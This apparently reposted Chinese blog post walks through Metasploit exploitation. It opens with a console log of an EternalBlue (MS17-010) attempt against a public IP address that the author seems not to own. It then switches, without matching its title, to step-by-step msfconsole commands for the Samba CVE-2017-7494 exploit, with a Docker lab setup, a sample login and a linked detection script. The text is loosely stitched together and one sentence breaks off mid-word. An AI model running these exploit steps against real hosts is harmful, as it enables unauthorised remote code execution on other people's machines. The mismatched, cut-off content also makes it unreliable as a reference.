使用MSF利用永恆之藍漏洞遠程控制主機——直接使用MSF即可RCE,我++,在docker里沒有完成,GG!


msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 60.52.99.53
rhost => 60.52.99.53
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445
rport => 445
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.0.100:4444 
[*] 60.52.99.53:445 - Executing automatic check (disable AutoCheck to override)
[*] 60.52.99.53:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 60.52.99.53:445       - Scanned 1 of 1 hosts (100% complete)
[-] 60.52.99.53:445 - Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.

自己找了一台機器試了下,因為要開啟反彈shell,所以還是要你自己搭建一個vps才行!

 

漏洞信息:

2017年5月24日Samba發布了4.6.4版本,中間修復了一個嚴重的遠程代碼執行漏洞,漏洞編號CVE-2017-7494,漏洞影響了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中間的所有版本。

漏洞利用條件:

1. 服務器打開了文件/打印機共享端口445,讓其能夠在公網上訪問

2. 共享文件擁有寫入權限

3. 惡意攻擊者需猜解Samba服務端共享目錄的物理路徑

滿足以上條件時,由於Samba能夠為選定的目錄創建網絡共享,當惡意的客戶端連接上一個可寫的共享目錄時,通過上傳惡意的鏈接庫文件,使服務端程序加載並執行它,從而實現遠程代碼執行。根據服務器的情況,攻擊者還有可能以root身份執

測試環境:

在docker下搭建測試環境

1.拉取鏡像到本地

root@backlion-virtual-machine:/home/backlion# docker pull medicean/vulapps:s_samba_1

2.啟動環境,並將虛擬的445端口映射到物理機的445端口上:

root@backlion-virtual-machine:/home/backlion# docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1

3.在msf下的利用(kali主機IP: 10.0.0.140,靶機下的ubuntu的物理住機IP:10.0.0.158)

利用的poc:

https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb

將is_known_pipename.rb

拷貝到/usr/share/metasploit-framework/modules/exploits/linux/samba/

匿名下的samba遠程執行之MSF:

復制代碼
root@backlion:~# service postgresql start

root@backlion:~# msfconsole msf > search is_known_pipename msf > use exploit/linux/samba/is_known_pipename msf exploit(is_known_pipename) > show options msf exploit(is_known_pipename) > set rhost 10.0.0.158 msf exploit(is_known_pipename) > set rport 445 msf exploit(is_known_pipename) > exploit
復制代碼

 

認證的samb下MSF:

復制代碼
msf exploit(is_known_pipename) > set SMBUSER test msf exploit(is_known_pipename) > set SMBPASS 123456 msf exploit(is_known_pipename) > set rhost 10.0.0.158 msf exploit(is_known_pipename) > set rport 445 msf exploit(is_known_pipename) > exploit
復制代碼

漏洞檢查的NAMP腳本:

http://ys-k.ys168.com/576161633/UIwHtkm3L3K3I865MJ6/samb.nse

 

 

參考文獻:

https://mp.weixin.qq.com/s/qWFe3yBg6NUU_kyVRiAzeA
https://mp.weixin.qq.com/s/PPcIhfkrJGoOEf7-Skvr-A

https://mobile.qzone.qq.com/details?sharetag=2866CD731987ABFF941F7FA2F69E8975&bp7=&bp2=&bp1=&_wv=1&res_uin=49870569&appid=2&cellid=1496512730&no_topbar=1&subid=&g_ut=3&from=mp


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM